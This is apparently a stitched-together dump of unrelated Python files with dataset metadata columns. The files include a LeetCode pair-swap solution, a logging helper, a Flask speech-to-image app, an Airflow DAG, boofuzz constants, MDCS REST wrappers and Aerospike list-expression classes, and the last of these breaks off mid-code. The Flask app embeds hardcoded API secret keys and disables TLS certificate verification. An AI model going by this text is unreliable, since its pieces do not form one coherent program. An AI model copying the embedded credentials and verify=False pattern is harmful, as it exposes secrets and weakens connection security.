l1.next.next.next = ListNode(4)
l1.next.next.next.next = ListNode(5)
l1.next.next.next.next.next = ListNode(6)
head = l1
res = Solution().swapPairs(head)
while res:
print(res.val)
res = res.next | 23.35 | 65 | 0.540328 | """
@Author: huuuuusy
@GitHub: https://github.com/huuuuusy
系统: Ubuntu 18.04
IDE: VS Code 1.37
工具: python == 3.7.3
"""
"""
思路:
暴力解法,直接取出所有元素,排序后再存入新的链表中
结果:
执行用时 : 48 ms, 在所有 Python3 提交中击败了76.77%的用户
内存消耗 : 13.8 MB, 在所有 Python3 提交中击败了5.93%的用户
"""
# 定义链表
class ListNode:
def __init__(self,x):
self.val = x
self.next = None
class Solution:
def swapPairs(self, head):
"""
:type head: ListNode
:type n: int
:rtype: ListNode
"""
point = head
# 排除特殊情况
if head is None or head.next is None:
return head
while head:
# 正常情况:两两交换
if head.next.next is not None:
head.val, head.next.val = head.next.val, head.val
head = head.next.next
# 奇数个节点时
if head.next is not None and head.next.next is None:
head.val, head.next.val = head.next.val, head.val
return point
if head.next is None:
return point
if __name__ == "__main__":
l1 = ListNode(1)
l1.next = ListNode(2)
l1.next.next = ListNode(3)
l1.next.next.next = ListNode(4)
l1.next.next.next.next = ListNode(5)
l1.next.next.next.next.next = ListNode(6)
head = l1
res = Solution().swapPairs(head)
while res:
print(res.val)
res = res.next | 46 | 703 | 72 |
9f592c9983e58816d6a9a02264b3012dba617a05 | 1,290 | py | Python | logger.py | Anu1996rag/PythonLogging | 3231c76c680a20df27182e99ffcc116f95b5f864 | [
"MIT"
] | null | null | null | logger.py | Anu1996rag/PythonLogging | 3231c76c680a20df27182e99ffcc116f95b5f864 | [
"MIT"
] | null | null | null | logger.py | Anu1996rag/PythonLogging | 3231c76c680a20df27182e99ffcc116f95b5f864 | [
"MIT"
] | null | null | null | # this file creates new log files in the particular folders created by the
# createFolder file and generates separate log files for separate programs
import os,inspect
import logging,logging.config
from createFolder import createFolder
# logging levels
loglevel = "debug"
if loglevel.upper() == "DEBUG":
loglevels = logging.DEBUG
elif loglevel.upper() == "INFO":
loglevels = logging.DEBUG
elif loglevel.upper() == "WARNING":
loglevels = logging.WARNING
elif loglevel.upper() == "ERROR":
loglevels = logging.ERROR
elif loglevel.upper() == "CRITICAL":
loglevels = logging.CRITICAL
else:
loglevels = logging.DEBUG
| 26.326531 | 110 | 0.717054 | # this file creates new log files in the particular folders created by the
# createFolder file and generates separate log files for separate programs
import os,inspect
import logging,logging.config
from createFolder import createFolder
# logging levels
loglevel = "debug"
if loglevel.upper() == "DEBUG":
loglevels = logging.DEBUG
elif loglevel.upper() == "INFO":
loglevels = logging.DEBUG
elif loglevel.upper() == "WARNING":
loglevels = logging.WARNING
elif loglevel.upper() == "ERROR":
loglevels = logging.ERROR
elif loglevel.upper() == "CRITICAL":
loglevels = logging.CRITICAL
else:
loglevels = logging.DEBUG
def createLogFile(logfilename):
return logging.config.fileConfig(fname='loggingConfiguration.conf', defaults={'logfilename': logfilename})
def loggingInfo(loglevel=logging.DEBUG):
#creting new folder
folderPath = createFolder()
#path of the micro services file to be called
path = str(inspect.stack()[1][1]).split("/")
# file name extracted from the path
filename = path[len(path) - 1]
fileLogName = os.getcwd() + folderPath + filename + ".log"
#creating new log file
createLogFile(fileLogName)
print('log file created')
logger = logging.getLogger(fileLogName)
logger.setLevel(loglevels)
| 600 | 0 | 46 |
e0c9ffa5cddba48275d62feb92bcea844dd90204 | 2,764 | py | Python | app.py | galaxyxxxxx/audio2img | d44a34de1fb7c6bcd5dc3ba40704077a457e9c48 | [
"MIT"
] | null | null | null | app.py | galaxyxxxxx/audio2img | d44a34de1fb7c6bcd5dc3ba40704077a457e9c48 | [
"MIT"
] | null | null | null | app.py | galaxyxxxxx/audio2img | d44a34de1fb7c6bcd5dc3ba40704077a457e9c48 | [
"MIT"
] | 1 | 2021-01-27T05:47:03.000Z | 2021-01-27T05:47:03.000Z | from flask import Flask, render_template, request, jsonify,redirect, url_for
from werkzeug.utils import secure_filename
import requests
import random
import json
import os
import time
import xlrd
from flask_cors import CORS
from requests_toolbelt import MultipartEncoder
app = Flask(__name__)
#CORS(app, supports_credentials=True) #For跨域请求
#app.config['SEND_FILE_MAX_AGE_DEFAULT'] = timedelta(seconds=1) #缓存控制时长
# 语音识别api
ASR_URL = 'https://voice.lenovomm.com/lasf/asr'
# 根据语音识别内容 选择图片
@app.route('/')
@app.route('/receiveAudio', methods=['POST'])
if __name__ == '__main__':
app.run(debug=True)
| 31.05618 | 118 | 0.613965 | from flask import Flask, render_template, request, jsonify,redirect, url_for
from werkzeug.utils import secure_filename
import requests
import random
import json
import os
import time
import xlrd
from flask_cors import CORS
from requests_toolbelt import MultipartEncoder
app = Flask(__name__)
#CORS(app, supports_credentials=True) #For跨域请求
#app.config['SEND_FILE_MAX_AGE_DEFAULT'] = timedelta(seconds=1) #缓存控制时长
# 语音识别api
ASR_URL = 'https://voice.lenovomm.com/lasf/asr'
def send(ixid, pidx, over, session, voice):
files = {'voice-data': voice}
data = {
'param-data': 'cpf=windows&dtp=iO2S&ver=1.1.9&did=270931c188c281ca&uid=6922073&'
'dev=lenovo.ecs.vt&app=com.lenovo.menu_assistant&stm=1494237601458&'
'ssm=true&vdm=all&rvr=&sce=long&ntt=wifi&aue=speex-wb;7&'
'auf=audio%2FL16%3Brate%3D16000&ixid=' + str(ixid) + '&pidx=' + str(pidx) + '&over=' + str(over)
}
header = {
'lenovokey': 'LENOVO-VOICE-4a817ca65xb7fa574yf252',
'secretkey': 'BBDAB59701C1CEA201968DFB7E3DAAD7',
'channel': 'cloudasr'
}
response = session.post(ASR_URL, headers=header, data=data, files=files, verify=False, timeout=30)
print(response.text)
return response
# 根据语音识别内容 选择图片
def filter(text):
word_list=["天空","阳光","云","海","草","花","山","楼","车","路"]
result=[1 if i in text else 0 for i in word_list]
keyWords = result
book = xlrd.open_workbook("./static/image/test.xlsx")
sheet1 = book.sheet_by_index(0) # 打开索引号为0的表
scores = {}
lists = []
# 读取图片权重分值
for i in range(sheet1.nrows):
row = sheet1.row_values(i) # 逐行读取
scores[row[0]] = [row[1:11]]
# 计算加权平均数
for name in scores:
total = 0
for x in scores[name]:
for i in range(len(x)):
total += x[i]*keyWords[i]
lists.append([name,total])
# 排序
def takeSecond(elem):
return elem[1]
lists.sort(key = takeSecond, reverse = True)
tem = lists[0]
name = tem[0]
name_num = name[-2:]
name_num_int = int(name_num)
nameNum = name_num_int*10 + random.randint(0,3)
fileName = './static/image/'+'image' + str (nameNum) + '.jpg'
return fileName
@app.route('/')
def home():
return render_template('index.html')
@app.route('/receiveAudio', methods=['POST'])
def receiveAudio():
session = requests.session()
ixid = int(round(time.time() * 1000))
pidx = 1
file = request.files['file'].read()
txt = send(ixid, pidx, 1, session, file).json().get("rawText","") #识别的语音内容
imgUrl = filter(txt) #对应的图片
return imgUrl
if __name__ == '__main__':
app.run(debug=True)
| 2,160 | 0 | 89 |
758f9f954011f69548b7ff155de4e6d303ed3998 | 756 | py | Python | easy/count-primes.py | therealabdi2/LeetcodeQuestions | 4c45ee836482a2c7b59906f7a7a99b5b3fa17317 | [
"MIT"
] | null | null | null | easy/count-primes.py | therealabdi2/LeetcodeQuestions | 4c45ee836482a2c7b59906f7a7a99b5b3fa17317 | [
"MIT"
] | null | null | null | easy/count-primes.py | therealabdi2/LeetcodeQuestions | 4c45ee836482a2c7b59906f7a7a99b5b3fa17317 | [
"MIT"
] | null | null | null | """Count the number of prime numbers less than a non-negative number, n.
Example 1:
Input: n = 10
Output: 4
Explanation: There are 4 prime numbers less than 10, they are 2, 3, 5, 7.
Example 2:
Input: n = 0
Output: 0
Example 3:
Input: n = 1
Output: 0"""
import math
s = Solution()
print(s.countPrimes(12))
| 19.894737 | 78 | 0.589947 | """Count the number of prime numbers less than a non-negative number, n.
Example 1:
Input: n = 10
Output: 4
Explanation: There are 4 prime numbers less than 10, they are 2, 3, 5, 7.
Example 2:
Input: n = 0
Output: 0
Example 3:
Input: n = 1
Output: 0"""
import math
class Solution:
def countPrimes(self, n: int) -> int:
if n < 2:
return 0
isPrime = [True] * n
isPrime[0] = isPrime[1] = False
for i in range(2, int(math.ceil(math.sqrt(n)))):
if isPrime[i]:
for multiples_of_i in range(i * i, n, i):
isPrime[multiples_of_i] = False
return sum(isPrime) # return the number of True elements in the array
s = Solution()
print(s.countPrimes(12))
| 399 | -6 | 49 |
1cab8e10520f9ed00a854568085670a24e8869bf | 1,041 | py | Python | train/grid_search.py | veritas9872/Knowledge-Distillation-Task | d260b1057c96cfc52af8ff7a0775befbd102f59d | [
"MIT"
] | 2 | 2020-02-16T13:30:27.000Z | 2021-01-18T14:18:26.000Z | train/grid_search.py | veritas9872/Knowledge-Distillation-Task | d260b1057c96cfc52af8ff7a0775befbd102f59d | [
"MIT"
] | null | null | null | train/grid_search.py | veritas9872/Knowledge-Distillation-Task | d260b1057c96cfc52af8ff7a0775befbd102f59d | [
"MIT"
] | null | null | null | """
Code for applying grid search to find the best parameters for knowledge distillation.
The distillation ratio and temperature parameters are being tuned in this search.
"""
import torch
from train.distill_knowledge import main
from utils.options import knowledge_distillation_options
if __name__ == '__main__':
# Reproducibility settings.
torch.backends.cudnn.benchmark = False
torch.backends.cudnn.deterministic = True
grid_search()
| 31.545455 | 91 | 0.673391 | """
Code for applying grid search to find the best parameters for knowledge distillation.
The distillation ratio and temperature parameters are being tuned in this search.
"""
import torch
from train.distill_knowledge import main
from utils.options import knowledge_distillation_options
def grid_search():
options = dict(
train_method='Search'
)
temperatures = [1, 2, 4, 8, 16, 32, 64]
distill_ratios = [1., 0.99, 0.95, 0.9, 0.75, 0.5, 0.25, 0.1, 0.05, 0.01, 0.]
for temp in temperatures:
for dist in distill_ratios:
options['temperature'] = temp
options['distill_ratio'] = dist
opt = knowledge_distillation_options(**options).parse_args()
# Reproducibility settings. Seeding must be repeated at the start of every run.
torch.random.manual_seed(9872)
main(opt)
if __name__ == '__main__':
# Reproducibility settings.
torch.backends.cudnn.benchmark = False
torch.backends.cudnn.deterministic = True
grid_search()
| 561 | 0 | 23 |
6ee110a8e3ab8f33b2314a11563292fe766bc8bb | 1,121 | py | Python | psst.py | Thomas-Hirsch/airflow-dags | 37b1e9a44dbfd508c1f6b86c712d699bfdff4ca2 | [
"Apache-2.0"
] | null | null | null | psst.py | Thomas-Hirsch/airflow-dags | 37b1e9a44dbfd508c1f6b86c712d699bfdff4ca2 | [
"Apache-2.0"
] | null | null | null | psst.py | Thomas-Hirsch/airflow-dags | 37b1e9a44dbfd508c1f6b86c712d699bfdff4ca2 | [
"Apache-2.0"
] | null | null | null | from datetime import datetime, timedelta
import airflow
from airflow import DAG
from airflow.contrib.operators.kubernetes_pod_operator import KubernetesPodOperator
from airflow.utils.dates import days_ago
# GLOBAL ENV VARIABLES
IMAGE_VERSION = "v1.0.0"
IMAGE = f"593291632749.dkr.ecr.eu-west-1.amazonaws.com/airflow-psst-data:{IMAGE_VERSION}"
ROLE = "airflow_psst_data"
# Task arguments
task_args = {
"depends_on_past": False,
"email_on_failure": True,
"owner": "samtazzyman",
"email": ["samuel.tazzyman@digital.justice.gov.uk"],
}
# DAG defined
dag = DAG(
"psst_data",
default_args=task_args,
description="get new prison reports, process them, and put them in the psst",
start_date=datetime(2019, 2, 21),
schedule_interval="@daily",
catchup=False,
)
task_id = "psst-data"
task1 = KubernetesPodOperator(
dag=dag,
namespace="airflow",
image=IMAGE,
env_vars={
},
labels={"app": dag.dag_id},
name=task_id,
in_cluster=True,
task_id=task_id,
get_logs=True,
startup_timeout_seconds=500,
annotations={"iam.amazonaws.com/role": ROLE},
) | 24.911111 | 89 | 0.711864 | from datetime import datetime, timedelta
import airflow
from airflow import DAG
from airflow.contrib.operators.kubernetes_pod_operator import KubernetesPodOperator
from airflow.utils.dates import days_ago
# GLOBAL ENV VARIABLES
IMAGE_VERSION = "v1.0.0"
IMAGE = f"593291632749.dkr.ecr.eu-west-1.amazonaws.com/airflow-psst-data:{IMAGE_VERSION}"
ROLE = "airflow_psst_data"
# Task arguments
task_args = {
"depends_on_past": False,
"email_on_failure": True,
"owner": "samtazzyman",
"email": ["samuel.tazzyman@digital.justice.gov.uk"],
}
# DAG defined
dag = DAG(
"psst_data",
default_args=task_args,
description="get new prison reports, process them, and put them in the psst",
start_date=datetime(2019, 2, 21),
schedule_interval="@daily",
catchup=False,
)
task_id = "psst-data"
task1 = KubernetesPodOperator(
dag=dag,
namespace="airflow",
image=IMAGE,
env_vars={
},
labels={"app": dag.dag_id},
name=task_id,
in_cluster=True,
task_id=task_id,
get_logs=True,
startup_timeout_seconds=500,
annotations={"iam.amazonaws.com/role": ROLE},
) | 0 | 0 | 0 |
dd078f8b597fc5457e2c4a5dbf2b958195904e31 | 661 | py | Python | boofuzz/boofuzz/connections/ip_constants.py | mrTavas/owasp-fstm-auto | 6e9ff36e46d885701c7419db3eca15f12063a7f3 | [
"CC0-1.0"
] | 2 | 2021-05-05T12:03:01.000Z | 2021-06-04T14:27:15.000Z | boofuzz/boofuzz/connections/ip_constants.py | mrTavas/owasp-fstm-auto | 6e9ff36e46d885701c7419db3eca15f12063a7f3 | [
"CC0-1.0"
] | null | null | null | boofuzz/boofuzz/connections/ip_constants.py | mrTavas/owasp-fstm-auto | 6e9ff36e46d885701c7419db3eca15f12063a7f3 | [
"CC0-1.0"
] | 2 | 2021-05-05T12:03:09.000Z | 2021-06-04T14:27:21.000Z | """
This file contains constants for the IPv4 protocol.
.. versionchanged:: 0.2.0
ip_constants has been moved into the connections subpackage.
The full path is now boofuzz.connections.ip_constants
"""
IPV4_PROTOCOL_UDP = 0x11
#: Theoretical maximum length of a UDP packet, based on constraints in the UDP
#: packet format.
#: WARNING! a UDP packet cannot actually be this long in the context of IPv4!
UDP_MAX_LENGTH_THEORETICAL = 65535
#: Theoretical maximum length of a UDP payload based on constraints in the
#: UDP and IPv4 packet formats.
#: WARNING! Some systems may set a payload limit smaller than this.
UDP_MAX_PAYLOAD_IPV4_THEORETICAL = 65507
| 38.882353 | 78 | 0.779123 | """
This file contains constants for the IPv4 protocol.
.. versionchanged:: 0.2.0
ip_constants has been moved into the connections subpackage.
The full path is now boofuzz.connections.ip_constants
"""
IPV4_PROTOCOL_UDP = 0x11
#: Theoretical maximum length of a UDP packet, based on constraints in the UDP
#: packet format.
#: WARNING! a UDP packet cannot actually be this long in the context of IPv4!
UDP_MAX_LENGTH_THEORETICAL = 65535
#: Theoretical maximum length of a UDP payload based on constraints in the
#: UDP and IPv4 packet formats.
#: WARNING! Some systems may set a payload limit smaller than this.
UDP_MAX_PAYLOAD_IPV4_THEORETICAL = 65507
| 0 | 0 | 0 |
31e33b4f971db68d33d49ba1581c6e72c9b06d43 | 4,183 | py | Python | mdcs/explore.py | knc6/MDCS-api-tools | eb51a1124e3daf2c4c1e968395f66e85c22b92f9 | [
"CC0-1.0"
] | null | null | null | mdcs/explore.py | knc6/MDCS-api-tools | eb51a1124e3daf2c4c1e968395f66e85c22b92f9 | [
"CC0-1.0"
] | null | null | null | mdcs/explore.py | knc6/MDCS-api-tools | eb51a1124e3daf2c4c1e968395f66e85c22b92f9 | [
"CC0-1.0"
] | null | null | null | #! /usr/bin/env python
import requests
from collections import OrderedDict
from utils import check_response
def select_all(host,user,pswd,cert=None,format=None):
"""Get all data from the MDCS server
Inputs:
host - string, URL of MDCS instance
user - string, username of desired account on MDCS server
pswd - string, password of desired account on MDCS server
cert - string, path to authentication certificate
format - string, format of data (can be xml or json)
Output:
lists where each entry is a dictionary describing entries that match the query.
dictionaries each have the keys:
title - title of the entry
schema - ID of the schema that describes the entry
content - content of the entry in either xml or json format
_id - ID number of the entry
"""
url = host.strip("/") + "/rest/explore/select/all"
params = dict()
if format: params['dataformat'] = format
r = requests.get(url, params=params, auth=(user, pswd), verify=cert)
return check_response(r)
def select(host,user,pswd,cert=None,format=None,ID=None,template=None,title=None):
"""Get all data that fits a certain simple query
Inputs:
host - string, URL of MDCS instance
user - string, username of desired account on MDCS server
pswd - string, password of desired account on MDCS server
cert - string, path to authentication certificate
format - string, format of data (can be xml or json)
template - string, ID of the schema for particular data
ID - string, ID of entry to be retrieved
title - string, title of data to be retrieved
Output:
list of all entries in the database
dictionaries each have the keys:
title - title of the entry
schema - ID of the schema that describes the entry
content - content of the entry in either xml or json format
_id - ID number of the entry
"""
url = host.strip("/") + "/rest/explore/select"
params = dict()
if format: params['dataformat'] = format
if ID: params['id'] = ID
if template: params['schema'] = template
if title: params['title'] = title
r = requests.get(url, params=params, auth=(user, pswd), verify=cert)
return check_response(r)
def delete(ID,host,user,pswd,cert=None):
"""Delete an entry
Input:
ID - string, ID of object to be deleted
host - string, URL of MDCS instance
user - string, username of desired account on MDCS server
pswd - string, password of desired account on MDCS server
cert - string, path to authentication certificate
Output:
response from MDCS
"""
url = host.strip("/") + "/rest/explore/delete"
params = dict()
params['id']=ID
r = requests.delete(url, params=params, auth=(user, pswd), verify=cert)
return check_response(r)
def query(host,user,pswd,cert=None,format=None,query=None,repositories=None):
"""Query by example.
Input:
host - string, URL of MDCS instance
user - string, username of desired account on MDCS server
pswd - string, password of desired account on MDCS server
cert - string, path to authentication certificate
format - string, format of data (can be xml or json)
respositories - string, lists of names of other repositories to be
Output:
lists where each entry is a dictionary describing entries that match the query.
dictionaries each have the keys:
title - title of the entry
schema - ID of the schema that describes the entry
content - content of the entry in either xml or json format
_id - ID number of the entry
"""
url = host.strip("/") + "/rest/explore/query-by-example"
data = dict()
if format: data['dataformat'] = format
if query: data['query'] = query
if repositories: data['repositories'] = repositories
r = requests.post(url, data=data, auth=(user, pswd), verify=cert)
return check_response(r) | 41.415842 | 87 | 0.643318 | #! /usr/bin/env python
import requests
from collections import OrderedDict
from utils import check_response
def select_all(host,user,pswd,cert=None,format=None):
"""Get all data from the MDCS server
Inputs:
host - string, URL of MDCS instance
user - string, username of desired account on MDCS server
pswd - string, password of desired account on MDCS server
cert - string, path to authentication certificate
format - string, format of data (can be xml or json)
Output:
lists where each entry is a dictionary describing entries that match the query.
dictionaries each have the keys:
title - title of the entry
schema - ID of the schema that describes the entry
content - content of the entry in either xml or json format
_id - ID number of the entry
"""
url = host.strip("/") + "/rest/explore/select/all"
params = dict()
if format: params['dataformat'] = format
r = requests.get(url, params=params, auth=(user, pswd), verify=cert)
return check_response(r)
def select(host,user,pswd,cert=None,format=None,ID=None,template=None,title=None):
"""Get all data that fits a certain simple query
Inputs:
host - string, URL of MDCS instance
user - string, username of desired account on MDCS server
pswd - string, password of desired account on MDCS server
cert - string, path to authentication certificate
format - string, format of data (can be xml or json)
template - string, ID of the schema for particular data
ID - string, ID of entry to be retrieved
title - string, title of data to be retrieved
Output:
list of all entries in the database
dictionaries each have the keys:
title - title of the entry
schema - ID of the schema that describes the entry
content - content of the entry in either xml or json format
_id - ID number of the entry
"""
url = host.strip("/") + "/rest/explore/select"
params = dict()
if format: params['dataformat'] = format
if ID: params['id'] = ID
if template: params['schema'] = template
if title: params['title'] = title
r = requests.get(url, params=params, auth=(user, pswd), verify=cert)
return check_response(r)
def delete(ID,host,user,pswd,cert=None):
"""Delete an entry
Input:
ID - string, ID of object to be deleted
host - string, URL of MDCS instance
user - string, username of desired account on MDCS server
pswd - string, password of desired account on MDCS server
cert - string, path to authentication certificate
Output:
response from MDCS
"""
url = host.strip("/") + "/rest/explore/delete"
params = dict()
params['id']=ID
r = requests.delete(url, params=params, auth=(user, pswd), verify=cert)
return check_response(r)
def query(host,user,pswd,cert=None,format=None,query=None,repositories=None):
"""Query by example.
Input:
host - string, URL of MDCS instance
user - string, username of desired account on MDCS server
pswd - string, password of desired account on MDCS server
cert - string, path to authentication certificate
format - string, format of data (can be xml or json)
respositories - string, lists of names of other repositories to be
Output:
lists where each entry is a dictionary describing entries that match the query.
dictionaries each have the keys:
title - title of the entry
schema - ID of the schema that describes the entry
content - content of the entry in either xml or json format
_id - ID number of the entry
"""
url = host.strip("/") + "/rest/explore/query-by-example"
data = dict()
if format: data['dataformat'] = format
if query: data['query'] = query
if repositories: data['repositories'] = repositories
r = requests.post(url, data=data, auth=(user, pswd), verify=cert)
return check_response(r) | 0 | 0 | 0 |
d3e0669a72fd4a4883dec6a69028023f6abf7602 | 45,858 | py | Python | aerospike_helpers/expressions/list.py | mcoberly2/aerospike-client-python | d405891f0d6d8b2fc14f78841370bc6a1d302494 | [
"Apache-2.0"
] | null | null | null | aerospike_helpers/expressions/list.py | mcoberly2/aerospike-client-python | d405891f0d6d8b2fc14f78841370bc6a1d302494 | [
"Apache-2.0"
] | null | null | null | aerospike_helpers/expressions/list.py | mcoberly2/aerospike-client-python | d405891f0d6d8b2fc14f78841370bc6a1d302494 | [
"Apache-2.0"
] | null | null | null | ##########################################################################
# Copyright 2013-2021 Aerospike, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##########################################################################
'''
List expressions contain expressions for reading and modifying Lists. Most of
these operations are from the standard :mod:`List API <aerospike_helpers.operations.list_operations>`.
Example::
import aerospike_helpers.expressions as exp
#Take the size of list bin "a".
expr = exp.ListSize(None, exp.ListBin("a")).compile()
'''
from __future__ import annotations
from itertools import chain
from typing import List, Optional, Tuple, Union, Dict, Any
import aerospike
from aerospike_helpers import cdt_ctx
from aerospike_helpers.expressions.resources import _GenericExpr
from aerospike_helpers.expressions.resources import _BaseExpr
from aerospike_helpers.expressions.resources import _ExprOp
from aerospike_helpers.expressions.resources import ResultType
from aerospike_helpers.expressions.resources import _Keys
from aerospike_helpers.expressions.base import ListBin
######################
# List Mod Expressions
######################
TypeBinName = Union[_BaseExpr, str]
TypeListValue = Union[_BaseExpr, List[Any]]
TypeIndex = Union[_BaseExpr, int, aerospike.CDTInfinite]
TypeCTX = Union[None, List[cdt_ctx._cdt_ctx]]
TypeRank = Union[_BaseExpr, int, aerospike.CDTInfinite]
TypeCount = Union[_BaseExpr, int, aerospike.CDTInfinite]
TypeValue = Union[_BaseExpr, Any]
TypePolicy = Union[Dict[str, Any], None]
class ListAppend(_BaseExpr):
"""Create an expression that appends value to end of list."""
_op = aerospike.OP_LIST_APPEND
def __init__(self, ctx: TypeCTX, policy: TypePolicy, value: TypeValue, bin: TypeBinName):
""" Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
policy (TypePolicy): Optional dictionary of :ref:`List policies <aerospike_list_policies>`.
value (TypeValue): Value or value expression to append to list.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: List expression.
Example::
# Check if length of list bin "a" is > 5 after appending 1 item.
expr = exp.GT(
exp.ListSize(None, exp.ListAppend(None, None, 3, exp.ListBin("a"))),
5).compile()
"""
self._children = (
value,
_GenericExpr(_ExprOp._AS_EXP_CODE_CDT_LIST_CRMOD, 0, {_Keys.LIST_POLICY_KEY: policy} if policy is not None else {}),
bin if isinstance(bin, _BaseExpr) else ListBin(bin)
)
self._fixed = {}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
if policy is not None:
self._fixed[_Keys.LIST_POLICY_KEY] = policy
class ListAppendItems(_BaseExpr):
"""Create an expression that appends a list of items to the end of a list."""
_op = aerospike.OP_LIST_APPEND_ITEMS
def __init__(self, ctx: TypeCTX, policy: TypePolicy, value: TypeValue, bin: TypeBinName):
""" Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
policy (TypePolicy): Optional dictionary of :ref:`List policies <aerospike_list_policies>`.
value (TypeValue): List or list expression of items to be appended.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: List expression.
Example::
# Check if length of list bin "a" is > 5 after appending multiple items.
expr = exp.GT(
exp.ListSize(None, exp.ListAppendItems(None, None, [3, 2], exp.ListBin("a"))),
5).compile()
"""
self._children = (
value,
_GenericExpr(_ExprOp._AS_EXP_CODE_CDT_LIST_CRMOD, 0, {_Keys.LIST_POLICY_KEY: policy} if policy is not None else {}),
bin if isinstance(bin, _BaseExpr) else ListBin(bin)
)
self._fixed = {}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
if policy is not None:
self._fixed[_Keys.LIST_POLICY_KEY] = policy
class ListInsert(_BaseExpr):
"""Create an expression that inserts value to specified index of list."""
_op = aerospike.OP_LIST_INSERT
def __init__(self, ctx: TypeCTX, policy: TypePolicy, index: TypeIndex, value: TypeValue, bin: TypeBinName):
""" Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
policy (TypePolicy): Optional dictionary of :ref:`List policies <aerospike_list_policies>`.
index (TypeIndex): Target index for insertion, integer or integer expression.
value (TypeValue): Value or value expression to be inserted.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: List expression.
Example::
# Check if list bin "a" has length > 5 after insert.
expr = exp.GT(
exp.ListSize(None, exp.ListInsert(None, None, 0, 3, exp.ListBin("a"))),
5).compile()
"""
self._children = (
index,
value,
_GenericExpr(_ExprOp._AS_EXP_CODE_CDT_LIST_MOD, 0, {_Keys.LIST_POLICY_KEY: policy} if policy is not None else {}),
bin if isinstance(bin, _BaseExpr) else ListBin(bin)
)
self._fixed = {}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
if policy is not None:
self._fixed[_Keys.LIST_POLICY_KEY] = policy
class ListInsertItems(_BaseExpr):
"""Create an expression that inserts each input list item starting at specified index of list."""
_op = aerospike.OP_LIST_INSERT_ITEMS
def __init__(self, ctx: TypeCTX, policy: TypePolicy, index: TypeIndex, values: TypeListValue, bin: TypeBinName):
""" Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
policy (TypePolicy): Optional dictionary of :ref:`List policies <aerospike_list_policies>`.
index (TypeIndex): Target index where item insertion will begin, integer or integer expression.
values (TypeListValue): List or list expression of items to be inserted.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: List expression.
Example::
# Check if list bin "a" has length > 5 after inserting items.
expr = exp.GT(
exp.ListSize(None, exp.ListInsertItems(None, None, 0, [4, 7], exp.ListBin("a"))),
5).compile()
"""
self._children = (
index,
values,
_GenericExpr(_ExprOp._AS_EXP_CODE_CDT_LIST_MOD, 0, {_Keys.LIST_POLICY_KEY: policy} if policy is not None else {}),
bin if isinstance(bin, _BaseExpr) else ListBin(bin)
)
self._fixed = {}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
if policy is not None:
self._fixed[_Keys.LIST_POLICY_KEY] = policy
class ListIncrement(_BaseExpr):
"""Create an expression that increments list[index] by value."""
_op = aerospike.OP_LIST_INCREMENT
def __init__(self, ctx: TypeCTX, policy: TypePolicy, index: TypeIndex, value: TypeValue, bin: TypeBinName):
""" Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
policy (TypePolicy): Optional dictionary of :ref:`List policies <aerospike_list_policies>`.
index (TypeIndex): Index of value to increment.
value (TypeValue): Value or value expression.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: List expression.
Example::
# Check if incremented value in list bin "a" is the largest in the list.
expr = exp.Eq(
exp.ListGetByRank(None, aerospike.LIST_RETURN_VALUE, ResultType.INTEGER, -1, #rank of -1 == largest element.
exp.ListIncrement(None, None, 1, 5, exp.ListBin("a"))),
exp.ListGetByIndex(None, aerospike.LIST_RETURN_VALUE, ResultType.INTEGER, 1,
exp.ListIncrement(None, None, 1, 5, exp.ListBin("a")))
).compile()
"""
self._children = (
index,
value,
_GenericExpr(_ExprOp._AS_EXP_CODE_CDT_LIST_CRMOD, 0, {_Keys.LIST_POLICY_KEY: policy} if policy is not None else {}),
bin if isinstance(bin, _BaseExpr) else ListBin(bin)
)
self._fixed = {}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
if policy is not None:
self._fixed[_Keys.LIST_POLICY_KEY] = policy
class ListSet(_BaseExpr):
"""Create an expression that sets item value at specified index in list."""
_op = aerospike.OP_LIST_SET
def __init__(self, ctx: TypeCTX, policy: TypePolicy, index: TypeIndex, value: TypeValue, bin: TypeBinName):
""" Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
policy (TypePolicy): Optional dictionary of :ref:`List policies <aerospike_list_policies>`.
index (TypeIndex): index of value to set.
value (TypeValue): value or value expression to set index in list to.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: List expression.
Example::
# Get smallest element in list bin "a" after setting index 1 to 10.
expr = exp.ListGetByRank(None, aerospike.LIST_RETURN_VALUE, ResultType.INTEGER, 0,
exp.ListSet(None, None, 1, 10, exp.ListBin("a"))).compile()
"""
self._children = (
index,
value,
